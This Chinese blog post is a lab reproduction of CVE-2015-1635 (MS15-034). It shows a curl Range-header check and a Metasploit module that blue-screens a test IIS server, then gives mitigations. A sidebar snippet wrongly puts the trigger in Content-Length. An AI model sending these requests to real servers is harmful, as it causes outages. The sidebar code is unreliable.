HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)

最新推荐文章于 2024-04-18 02:45:26 发布
最新推荐文章于 2024-04-18 02:45:26 发布
阅读量3k 收藏 22
点赞数 19
分类专栏: 漏洞复现 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74985952/article/details/131157845
版权

HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)

这里写目录标题

漏洞概述

http.sys介绍

HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞

漏洞成因

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞

漏洞危害

攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。

影响版本

任何安装了微软IIS 6.0以上的的Windows 7、Windows Server 2008 R2、 Windows Server 2012 R2 、Windows Server 2012、Windows 8、2、Windows 8.1 系统

漏洞复现环境部署

windows7环境下部署IIS服务
控制面板–>程序–>程序和功能–>Internet信息服务
在这里插入图片描述
打开IIS管理器
控制面板–>系统和安全–>管理工具
在这里插入图片描述
查看默认网站首页是否启动
在这里插入图片描述
访问本地回环地址,查看IIS版本是否为6版本及以上
在这里插入图片描述

漏洞验证

win7靶机IP:192.168.147.162
kali攻击机:192.168.247.164
使用攻击机访问靶机查看网络是否互通
在这里插入图片描述
使用curl命令查看漏洞是否存在

curl http://192.168.247.162 -H "Host: 192.168.247.162" -H "Range: bytes=0-18446744073709551615"

返回状态码为416即证明该系统漏洞存在
在这里插入图片描述
使用msfconsole搜索ms15_034
在这里插入图片描述
使用模块0进行dos攻击,查看选项设置,端口默认80不用设置
在这里插入图片描述
设置目标主机地址,并开始进行dos攻击
在这里插入图片描述

攻击成功,靶机蓝屏重启
在这里插入图片描述

防护措施

  1. 打补丁
    https://learn.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
  2. 禁用IIS内核缓存
    在这里插入图片描述
    在这里插入图片描述
SuperMan529
关注
  • 19
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
每日漏洞 | HTTP.sys远程代码执行
03-12 1616
每日漏洞 | HTTP.sys远程代码执行
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
MS15-034 CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证)_ms15-034 cve-2015-1635 http远程代码执行漏洞检测
最新发布
2401_83974087的博客
04-18 415
当存在CVE-2015-1635漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行以及敏感信息泄露。该漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP请求时会导致此漏洞。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。
CVE-2015-1635
龙卷风摧毁停车场
02-21 1725
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。
HTTP.sys远程执行代码漏洞CVE-2015-1635,MS15-034)
Fly_鹏程万里
05-05 8549
前言 在2015年4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响...
HTTP.SYS远程代码执行漏洞CVE-2015-1635,MS15-034)
pyy的博客
12-11 1万+
漏洞描述及渗透过程 HTTP协议堆栈(HTTP.sys)中存在一个远程执行代码漏洞,该漏洞是在HTTP.sys不正确地分析特制HTTP请求时引起的。   漏洞危害 攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。 修复建议 1)微软官方已经给出修复补丁(KB3042553),用户安装修复补丁即可。 2) 变通办法,禁用IIS内核...
HTTP.SYS远程代码执行漏洞(蓝屏)
qq_60905276的博客
03-26 1万+
1.简介 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。不过我看了一下这个HTTP.SYS还发生过其他的远程代码执行漏洞,我还是表明它的漏洞编号吧。 CVE-2015-1635(MS15-034 ) 而HTTP.SYS是一个位于Win2003和WinXP SP2中的操作系统核心组件,能够让任何应用程序通过它提供的接口,以http协议进行信息通
HTTP.SYS远程代码执行漏洞
qq_44905657的博客
12-21 3184
HTTP.SYS远程代码执行漏洞
HTTP.sys远程代码执行漏洞
liu80990的博客
03-25 2万+
1. 漏洞描述 Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008...
漏洞复现(二):HTTP.SYS远程代码执行漏洞(MS15-034)
weixin_47306547的博客
11-20 8842
漏洞介绍 漏洞编号:CVE-2015-1635(MS15-034 ) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响范围 Windows 7 Windows Server 2008 R2 Windows 8 Windows Server 2012 Windows 8.1 Windows Server 2012 R2 漏
HTTP.sys远程代码执行
qq_50854662的博客
05-19 1150
HTTP.sys远程代码执行
Http.sys远程代码执行漏洞(CVE-2015-1635)补丁
04-09
Http.sys远程代码执行漏洞(CVE-2015-1635)补丁,Windows6.1-KB3042553-x64.msu ,适用于Windows Server 2008 R2 x64 ,亲测可用。
HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635) 漏洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
HTTP.SYS 远程执行代码漏洞分析(MS15-034 )
weixin_33948416的博客
09-08 788
  在2015年4月安全补丁日,微软发布了11项安全更新,共修复了包括Microsoft Windows、Internet Explorer、Office、.NET Framework、Server软件、Office Services和Web Apps中存在的26个安全漏洞。其中就修复了HTTP.sys 中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。    ...
HTTP.sys远程代码执行(CVE2015-1635)分析复现
加油~
08-16 2320
在这个过程中,如果range指定的数据开始offset小于紧凑的数据包头部的总长度,那么这里在计算最后的发包读取数据时,还会触发一个整数溢出,即0xffffffff(-1,已经被变为32位数)- lower + 1 + header size,如果lower < header size,那么将会导致最后32位整数溢出计算出一个较小的数值,这样导致不会BSOD(如果精确控制响应包大小和文件大小,即使这样还是有可能触发BSOD),告诉服务器,请求资源是哪个范围的内容,让断点续传和并行下载得以实现。...
CVE-2015-1635(MS15-034 )远程代码执行漏洞复现
热门推荐
m0_37638874的博客
06-10 2万+
  1 漏洞背景   2 漏洞影响   3 漏洞利用     3.1 服务器配置与搭建     3.2 测试       3.2.1 curl命令       3.2.2 Host字段       3.2.3 Range字段     3.3 攻击利用   4 防御措施1 漏洞背景2 漏洞影响3 漏洞利用3.1 服务器配置与搭建win7我们如何开启iis服务呢控制面板>程序和功能>打开或关闭windows功能>Internet信息服务>勾选Web管理工具和万维网服务 我们访问一下 如上所示证明开启了iis服
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034)
SoulCat
06-03 4315
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034) 后来我发现世界真的很大,没有刻意地见面,就真没有再见过了 漏洞概述: HTTP.SYS是从IIS6.0开始,为了更好的在windows上优化IIS服务器性能而引入一个操作系统核心组件。它为IIS及其他需要运用HTTP协议的服务器提供HTTP请求的接收与响应、快速缓存等功能服务。漏洞主要存在于 HTTP 协议堆...
cve-2015-1635漏洞复现
07-28
你好!对于CVE-2015-1635漏洞复现,首先需要明确这是一个远程代码执行漏洞,也被称为HTTP.sys远程代码执行漏洞。该漏洞存在于Microsoft Windows系统的HTTP协议堆栈中。 复现漏洞的一种方法是发送特制的HTTP请求来触发漏洞,并执行恶意代码。以下是一个简单的Python示例代码,用于发送恶意请求: ```python import requests url = "http://目标IP地址/" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Content-Length': '18446744073709551615', 'Host': '目标IP地址' } response = requests.get(url, headers=headers) print(response.text) ``` 在代码中,将`目标IP地址`替换为目标服务器的IP地址。这个请求会发送一个特殊长度的`Content-Length`头部字段,触发远程执行漏洞。 请注意,这个示例只是为了说明漏洞的原理,实际应用中需要谨慎操作并确保遵守法律法规。建议在合法授权和测试环境中进行漏洞测试,以维护网络安全。 如果你需要更详细的复现步骤或其他安全问题,请提供更多细节,我将尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值